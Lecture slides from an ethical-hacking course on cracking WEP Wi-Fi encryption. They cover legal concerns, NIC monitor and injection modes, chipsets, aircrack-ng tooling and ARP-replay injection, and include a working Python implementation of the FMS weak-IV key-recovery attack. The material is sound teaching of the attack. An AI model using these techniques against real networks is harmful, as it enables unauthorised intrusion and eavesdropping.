L14 More Wireless Hacking: Cracking Wired Equivalent Privacy (WEP) (it-slideshares.blogspot.com)
Post on 02-Jul-2015
Hands-On Ethical Hacking and Network Defense
Lecture 14: Cracking WEP
Last modified 5-11-09
Legal Concerns
Defeating security to enter a network without permission is clearly illegal, even if the security is weak.
Sniffing unencrypted wireless traffic may also be illegal: it could be regarded as an illegal wiretap.
The situation is unclear and varies from state to state. In California, privacy concerns tend to outweigh other considerations.
See links l14v, l14w.
Equipment
Wireless Network Interface Cards (NICs) and Drivers
The Goal
All wireless NICs can connect to an Access Point.
But hacking requires more than that, because we need to do two things the NIC was never designed for:
Sniffing: collecting traffic addressed to other devices
Injection: transmitting forged packets which will appear to be from other devices
Windows v. Linux
The best wireless hacking software is written for Linux. The Windows tools are inferior and don't support packet injection.
But all the wireless NICs are designed for Windows, and the drivers are written for Windows. Linux drivers are hard to find and confusing to install.
(These driver notes reflect the state of things in 2009, when this lecture was last modified; the aircrack-ng.org compatibility pages, link l_14a, are the place to check which chipsets and drivers currently support monitor mode and injection.)
Wireless NIC Modes
There are four modes a NIC can use:
Master mode
Managed mode
Ad-hoc mode
Monitor mode
See link l_14j
Master Mode
Also called AP or Infrastructure mode
Looks like an access point
Creates a network with a name (SSID) and a channel
Managed Mode
Also called Client mode
The usual mode for a Wi-Fi laptop
Joins a network created by a master
Automatically changes channel to match the master
Presents credentials and, if accepted, becomes associated with the master
Typical Wireless LAN
[Figure: an Access Point in Master Mode serving Clients in Managed Mode]
Ad-hoc Mode
[Figure: nodes in Ad-hoc Mode]
Peer-to-peer network
No master or Access Point
Nodes must agree on a channel and SSID
Monitor Mode
Does not associate with an Access Point
Listens to traffic
Like a wired NIC in Promiscuous Mode, with one difference that matters for this lecture: a promiscuous card still only sees the frames of the network it has joined, while a monitor-mode card captures raw 802.11 frames, management and control frames included, from every network on the channel without joining any of them.
[Figure: a NIC in Monitor Mode alongside an Access Point in Master Mode and a client in Managed Mode]
Wi-Fi NICs
To connect to a Wi-Fi network, you need a Network Interface Card (NIC).
The most common type is the PCMCIA card, designed for laptop computers.
USB and PCI Wi-Fi NICs
USB: can be used on a laptop or desktop PC
PCI: installs inside a desktop PC
Choosing a NIC
For penetration testing (hacking), consider these factors:
Chipset
Output power
Receiving sensitivity
External antenna connectors
Support for 802.11i and improved WEP versions
Wi-Fi NIC Manufacturers
Each wireless card has two manufacturers.
The card itself is made by a company like Netgear, Ubiquiti, Linksys, D-Link, and many, many others.
But the chipset (the control circuitry) is made by a different company.
Chipsets
To find out what chipset your card uses, you must search on the Web; card manufacturers don't want you to know. On Linux, lspci -nn (PCI cards) or lsusb (USB adapters) prints the vendor:device ID, which identifies the chipset regardless of the brand printed on the box, and is what to search for.
Major chipsets: Prism, Cisco Aironet, Hermes/Orinoco, Atheros. There are others.
Prism Chipset
Prism chipset is a favorite among hackers
Completely open: specifications available
Has more Linux drivers than any other chipset
See link l_14d
Prism Chipset
Prism chipset is the best choice for penetration testing
HostAP Linux drivers are highly recommended, supporting:
the NIC acting as an Access Point
use of the iwconfig command to configure the NIC
See link l_14h
Cisco Aironet Chipset
Cisco proprietary, not open
Based on Prism, with more features:
Regulated power output
Hardware-based channel-hopping
Very sensitive, good for wardriving
Cannot use HostAP drivers
Not useful for man-in-the-middle or other complex attacks
Hermes Chipset
Lucent proprietary, not open
Lucent published some source code for WaveLAN/ORiNOCO cards
Useful for all penetration testing, but requires the Shmoo driver patches (link l_14l) to use monitor mode
Atheros Chipset
The most common chipset in 802.11a devices
Best Atheros drivers are MadWiFi (link l_14m)
Some cards work better than others
Monitor mode is available, at least for some cards
Other Cards
If all else fails, you could use Windows drivers with a wrapper to make them work in Linux:
DriverLoader (link l_14n)
NdisWrapper (link l_14o)
But all you'll get is basic functions, not monitor mode or packet injection, so this is not much use for hacking.
Cracking WEP
Tools and Principles
A Simple WEP Crack
The Access Point and Client are using WEP encryption.
The hacker device just listens.
[Figure: a Hacker Listening to a WEP-Protected WLAN]
Listening is Slow
You need to capture 50,000 to 200,000 "interesting" packets to crack a 64-bit WEP key.
The "interesting" packets are the ones containing Initialization Vectors (IVs). WEP prepends a 24-bit IV, sent in the clear, to each encrypted data frame, and the IV concatenated with the secret key is the RC4 key for that frame; with a known first plaintext byte and enough IVs of the right shape, each captured frame leaks a little information about the secret key.
Only about 1/4 of the packets contain IVs, so you need 200,000 to 800,000 packets.
It can take hours or days to capture that many packets.
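Why IVs are the interesting part, as an added example that is not from the original slides or from the aircrack-ng project: a pure-Python reconstruction of the Fluhrer-Mantin-Shamir (FMS) weak-IV attack against a 40-bit ("64-bit") WEP key. Everything in it is constructed for the demo: the key 0a1b2c3d4e, the assumption that every data frame starts with the LLC/SNAP byte 0xAA (true of real WEP frames, and what gives the attacker a known plaintext byte), and a capture that is built to already hold the 256 classic weak IVs of the form (A+3, 255, X) for each key byte, instead of the hundreds of thousands of random frames a real sniff must wade through to find them.

```python
# Added example (not from the original slides): the FMS weak-IV attack on WEP.
# Constructed for the demo: a 40-bit secret key, frames whose first plaintext byte
# is the LLC/SNAP DSAP 0xAA, and a capture containing the weak IVs (A+3, 0xFF, X).
from collections import Counter

SNAP_DSAP = 0xAA            # first plaintext byte of every WEP data frame (known to attacker)
WEAK_SECOND_BYTE = 0xFF     # FMS weak IVs have the shape (A+3, 0xFF, X)


def rc4_ksa(key):
    """RC4 key scheduling: build the permutation S from the session key (IV || secret)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key):
    """First keystream byte of RC4 under `key`; the FMS attack needs nothing more."""
    S = rc4_ksa(key)
    j = S[1]                          # PRGA step 1: i = 1, j = 0 + S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def wep_first_ciphertext_byte(iv, secret):
    """What the station sends right after the cleartext IV: plaintext XOR RC4(IV || secret)."""
    return rc4_first_byte(bytes(iv) + bytes(secret)) ^ SNAP_DSAP


def capture_weak_ivs(secret):
    """Constructed 'sniffed' capture: (iv, first ciphertext byte) for every classic weak IV."""
    frames = []
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, WEAK_SECOND_BYTE, x)
            frames.append((iv, wep_first_ciphertext_byte(iv, secret)))
    return frames


def fms_votes(frames, known):
    """Vote for secret key byte number len(known), given the bytes recovered so far."""
    a = len(known)
    votes = Counter()
    for iv, c0 in frames:
        if iv[0] != a + 3:
            continue                                  # not weak for this key position
        session = list(iv) + list(known)              # K[0 .. a+2] is fully known
        S, j = list(range(256)), 0
        for i in range(a + 3):                        # replay the KSA through the known bytes
            j = (j + S[i] + session[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        # "Resolved" IV: the first PRGA output will be read from slot S[a+3] ...
        if S[1] >= a + 3 or (S[1] + S[S[1]]) & 0xFF != a + 3:
            continue
        # ... and with roughly 5% probability the rest of the KSA never touches that slot,
        # so the output is the value swapped in at step a+3: S[j + S[a+3] + K[a+3]].
        out = c0 ^ SNAP_DSAP                          # attacker knows the plaintext byte
        votes[(S.index(out) - j - S[a + 3]) & 0xFF] += 1
    return votes


def key_matches(frames, key, samples=8):
    """Re-encrypt a few captured frames under a candidate key and compare."""
    return all(wep_first_ciphertext_byte(iv, key) == c0 for iv, c0 in frames[::97][:samples])


def crack_wep(frames, key_len=5, fudge=8):
    """Depth-first search over the top-`fudge` vote winners for each byte (the idea behind
    aircrack's fudge factor), accepting only a complete key that verifies against the capture."""
    def search(known):
        if len(known) == key_len:
            return bytes(known) if key_matches(frames, known) else None
        for cand, _ in fms_votes(frames, known).most_common(fudge):
            found = search(known + [cand])
            if found is not None:
                return found
        return None
    return search([])


if __name__ == "__main__":
    secret = bytes.fromhex("0a1b2c3d4e")              # hypothetical 40-bit WEP key
    frames = capture_weak_ivs(secret)
    print(f"captured {len(frames)} weak-IV frames, each with its 3 IV bytes in the clear")
    print("recovered key:", crack_wep(frames).hex())
```

Each resolved IV votes for the right byte only about one time in twenty, which is why a real capture needs tens of thousands of IVs: the attacker cannot choose which IVs the victims use, only wait for enough weak ones to arrive. The depth-first search over the top few candidates is the same tolerance aircrack-ng exposes as its fudge factor (-f), covering the occasional byte where the true value is only the second or third most-voted candidate; a wrong prefix is rejected because no completion of it re-encrypts the captured frames correctly.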
Packet Injection
A second hacker machine injects packets to create more "interesting" packets. The usual trick is to capture one encrypted ARP request (recognizable by its fixed size even though it is encrypted) and replay it over and over: the Access Point answers each replay with a freshly encrypted frame, and every fresh frame carries a new IV.
[Figure: a Hacker Listening and a Hacker Injecting, both within range of the WEP-Protected WLAN]
Injection is MUCH Faster
With packet injection, the listener can collect 200 IVs per second.
5 to 10 minutes is usually enough to crack a 64-bit key.
Cracking a 128-bit key takes an hour or so.
Link l_14r
AP & Client Requirements
Access Point: any AP that supports WEP should be fine (they all do)
Client: any computer with any wireless card will do; could use Windows or Linux
[Figure: the WEP-Protected WLAN]
Listener Requirements
NIC must support Monitor Mode
Could use Windows or Linux, but you can't use NDISwrapper
Software:
Airodump (part of the Aircrack suite) for Windows or Linux (see link l_14q)
BackTrack is a live Linux CD with Aircrack on it (and many other hacking tools), link l_14n
[Figure: the Hacker Listening]
Injector Requirements
NIC must support injection
Must use Linux
Software: void11 and aireplay, link l_14q
[Figure: the Hacker Injecting]
Sources
Aircrack-ng.org (link l_14a)
Wi-Foo (link l_14c)
Vias.org (link l_14j)
smallnetbuilder.com (link l_14p)